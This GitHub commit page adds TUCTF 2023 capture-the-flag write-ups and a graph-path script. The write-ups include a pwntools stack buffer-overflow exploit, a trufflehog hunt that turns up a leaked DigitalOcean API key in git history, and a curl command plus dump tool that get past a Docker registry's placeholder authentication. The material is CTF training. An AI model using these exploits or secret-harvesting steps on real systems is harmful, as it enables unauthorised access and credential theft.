Skip to content

Commit

Permalink
tuctf 2023
Browse files Browse the repository at this point in the history
  • Loading branch information
@54toshi
54toshi committed Dec 3, 2023
1 parent 27dbb75 commit 0e62683
Show file tree
Hide file tree
Showing 4 changed files with 376 additions and 0 deletions.
213 changes: 213 additions & 0 deletions 2023_tuctf/agent.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,213 @@
from pwn import *
import random

# Change logging level to help with debugging (error/warning/info/debug)
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
#context.log_level = 'debug'

def mapper():
conn.sendlineafter(b':', 'HAHAHAHAHHAHAHAHAHAHAH')
status = conn.recvuntil(b'Option: ', drop=True).decode('latin-1')
print(status)
print()
print()
conn.send(b'2\r\n')
current = conn.recvuntil(b'Investigate:', drop=True).decode('latin-1')
print("current: "+current)
print()
print()
print()

path = ['Attaya']
with open('log.txt', 'a') as f:
f.write("===================================================\n'\n")
f.close()


while True:
city_options = []
current = current.split('\n')

for line in current:
if line.startswith('- Current'):
current_city = line.split(':')[1]
elif line.startswith('- Next'):
neighbours_splitted = line.split('|')
for i in range(len(neighbours_splitted)):
if i % 2: # if i is odd
city_options.append(neighbours_splitted[i].strip())
elif line.startswith('- Description'):
description = line.split(':')[1]

next_city = random.choice(city_options)
path.append(next_city)

print("current_city: "+str(current_city))
print("city_options: "+str(city_options))
print("description: "+str(description))
print("path: "+str(path))
print()
with open('log.txt', 'a') as f:
f.write("current_city: "+str(current_city)+'\n')
f.write("city_options: "+str(city_options)+'\n')
f.write("description: "+str(description)+'\n')
f.write("path: "+str(path)+'\n\n')
f.close()

conn.send(next_city + '\n')
current = conn.recvuntil(b'Investigate:', drop=True).decode('latin-1')


def get_path():
success = False
path_costs = {}

while not success:
neighbours = {
'Attaya': {
'Belandris': 10,
'Delato': 5,
'Charity': 3
},
'Charity': {
'Belandris': 8,
'Emell': 2,
'Flais': 8,
'Attaya': 3,
'Haphsa': 3,
'Delato': 1,
},
'Haphsa': {
'Iyona': 8,
'Kepliker': 7,
'Melyphora': 8,
'Queria': 10,
'Delato': 1,
},
'Melyphora': {
'Partamo': 4,
'Shariot': 11,
'Queria': 1,
},
'Queria': {
'Partamo': 1,
'Rhenora': 6,
'Shariot': 10,
},
'Partamo': {
'Osiros': 1,
'Rhenora': 5,
'Shariot': 9,
},
'Flais': {
'Gevani': 3,
'Iyona': 3,
'Haphsa': 1,
},
'Delato': {
'Flais': 5,
'Iyona': 5,
'Belandris': 3,
},
'Belandris': {
'Jolat': 15,
'Gevani': 8,
'Emell': 1,
},
'Jolat': {
'Osiros': 7,
'Leter': 4,
'Kepliker': 5,
},
'Gevani': {
'Jolat': 8,
'Iyona': 1,
'Haphsa': 6,
},
'Emell': {
'Gevani': 5,
'Iyona': 3,
'Flais': 5,
},
'Iyona': {
'Jolat': 15,
'Leter': 4,
'Kepliker': 3,
},
'Kepliker': {
'Leter': 5,
'Osiros': 2,
'Partamo': 6,
'Queria': 7,
'Delato': 2,
'Melyphora': 5,
},
'Leter': {
'Osiros': 3,
'Rhenora': 10,
},
'Osiros': {
'Shariot': 8,
'Rhenora': 6,
},
'Rhenora': {
'Notasto': 2,
'Shariot': 1,
},
'Notasto': {
'Shariot': 7
},
}

current_city = 'Attaya'
path = ['Attaya']
path_cost = 0
i = 0

while neighbours[current_city] != {}:
new_city = random.choice(list(neighbours[current_city].keys()))
path_cost += neighbours[current_city][new_city]
#print("i: "+str(i))
#print("current_city: "+current_city+" "+str(neighbours[current_city]))
#print("path_cost: "+str(path_cost))
#print("path: "+str(path))
#print()

current_city = new_city
path.append(new_city)
i += 1

if current_city == 'Shariot':
path_costs[path_cost] = path
break

# find path with lowest cost:
try:
lowest_cost = min(path_costs.keys())
except ValueError:
continue

print("cost: "+str(lowest_cost)+", path: "+str(path_costs[lowest_cost]))



# MAPPING

#while True:
# try:
# print("===================================================")
# print("trying to connect...")
# conn = remote('chal.tuctf.com', 30012)
# print("executing mapper()")
# print()
# print()
# mapper()
# print("closing connection...")
# conn.close()
# sleep(1)
# except EOFError:
# continue


# GET PATH
get_path()
Binary file added 2023_tuctf/hidden-value.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
115 changes: 115 additions & 0 deletions 2023_tuctf/writeup.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,115 @@

# tuctf 2023
https://tuctf.com/2023

### Index
- [Forensics](#forensics)
- [state of the git](#state-of-the-git)
- [Pwn](#pwn)
- [hidden values](#hidden-values)
- [Misc](#misc)
- [silly registry](#silly-registry)
- [secret agent](#secret-agent)


# Forensics

## state of the git
Description: <br>
given is an git repository, with an IaC (Infrastructure as Code) codebase written in Terraform.

You can search the repository for api keys with tools like [trufflehog](https://github.com/trufflesecurity/trufflehog), which will give you an digitalocean v2 API key.
```bash
# run "trufflehog filesystem ." inside git repository
🐷🔑🐷 TruffleHog. Unearth your secrets. 🐷🔑🐷

Found unverified result 🐷🔑❓
Detector Type: DigitalOceanV2
Decoder Type: BASE64
Raw result: dop_v1_07fbc880cf053a91979807dfaaf8ad5c9880abae1f8df2ccece966942af41408
File: .git/objects/95/5de908450115ce7b6892c2a58c03e7e2221a6f
Line: 60

# inspect the git object further
git cat-file -p 955de908450115ce7b6892c2a58c03e7e2221a6f

# the flag is base64 encoded in following line:
"password": "VFVDVEZ7NzNycjRmMHJtX1M3QTczLTF5XzUzY3IzNzV9Cg==", // ZG9wX3YxXzA3ZmJjODgwY2YwNTNhOTE5Nzk4MDdkZmFhZjhhZDVjOTg4MGFiYWUxZjhkZjJjY2VjZTk2Njk0MmFmNDE0MDgK < Change this before going !
```

# Pwn

## hidden values
Description: <br>
Given is an tcp socket, to whom you can connect with netcat.

<img src="./hidden-value.png" width="200">

You need to overwrite an variable on the stack with 0xdeadbeef, through an buffer overflow to trigger the if statement and get the flag:
```python
from pwn import *

# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# connect
io = remote("chal.tuctf.com", 30011)

# Build the payload
payload = flat(
b'A' * 44,
p32(0xdeadbeef)
)

# Send the payload
io.sendlineafter(b':', payload)
io.recvall()

# bruteforce location of 0xdeadbeef locally:
#for i in range(0,100):
# io = process('./hidden-value')
# io.sendlineafter(b':', b'A' * i + p32(0xdeadbeef))
# print(io.recvall().decode('latin-1'))
```


# Misc

## silly registry
Description: <br>
given is a hostname and port.

On the port runs https://distribution.github.io/distribution which is docker registry software to host docker container images. <br>
The registry uses silly authorization, which is for developing purposes and only check if the Authorization header is present and not the content.
- https://distribution.github.io/distribution/about/configuration/#silly
- https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry
- https://github.com/Syzik/DockerRegistryGrabber

```bash
# connect with Authorization header and retrieve image list
curl -H "Authorization: anything" http://chal.tuctf.com:30003/v2/_catalog

# use docker registry grabber to enumerate
python drg.py -A "lkas" http://chal.tuctf.com:30003/v2/ --dump_all

# the flag is one of the extracted images
```


## secret agent
Description: <br>
given is a tcp socket to whom you can connect with netcat.

Key: <br>
First you need to find the correct key, which is "HAHAHAHAHHAHAHAHAHAHAH"

Challenge1: <br>
Script for mapping the cities with their costs and calculating the cheapest path is [agent.py](./agent.py). The correct path with a cost of 20 is ['Attaya', 'Charity', 'Emell', 'Iyona', 'Kepliker', 'Osiros', 'Rhenora', 'Shariot'].

Challenge2: <br>
you get text in the braille alphabet " ⠥⠞⠀⠞⠉⠀⠎⠊⠋⠀⠍⠁⠀⠵⠁⠀⠝⠊⠀⠺⠊⠛⠀⠇⠇⠊⠀⠕⠉⠀⠍⠀⠑⠀⠃⠀⠅⠉⠁⠀⠛⠁⠀⠝⠊⠁". <br>
When decoding it with https://www.dcode.fr/braille-alphabet you get "UT TC SIF MA ZA NI WIG LLI OC M E B KCA GA NIA". <br>
Which is little endian, so you need to read each chunck from back to front, which results to TUCTFISAMAZINGIWILLCOMEBACKAGAIN.

Challenge3: <br>
Enter TUCTFISAMAZINGIWILLCOMEBACKAGAIN, and get the flag
48 changes: 48 additions & 0 deletions template.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
# ctf 2024
description


### Index
- [Web](#web)
- [chal1](#chal1)
- [chal2](#chal2)
- [chal3](#chal3)
- [Cryptography](#cryptography)
- [Reversing](#Reversing)
- [Pwn](#pwn)
- [Forensics](#forensics)
- [Osint](#osint)
- [Programming](#programming)
- [Stegonography](#stegonography)
- [Network](#Network)
- [Misc](#misc)



# Web

## chal1

<img src="test.png" alt="test.png" width="200"/>

## chal2

## chal3

# Cryptography

# Reversing

# Pwn

# Forensics

# Osint

# Programming

# Stegonography

# Network

# Misc

0 comments on commit 0e62683

Please sign in to comment.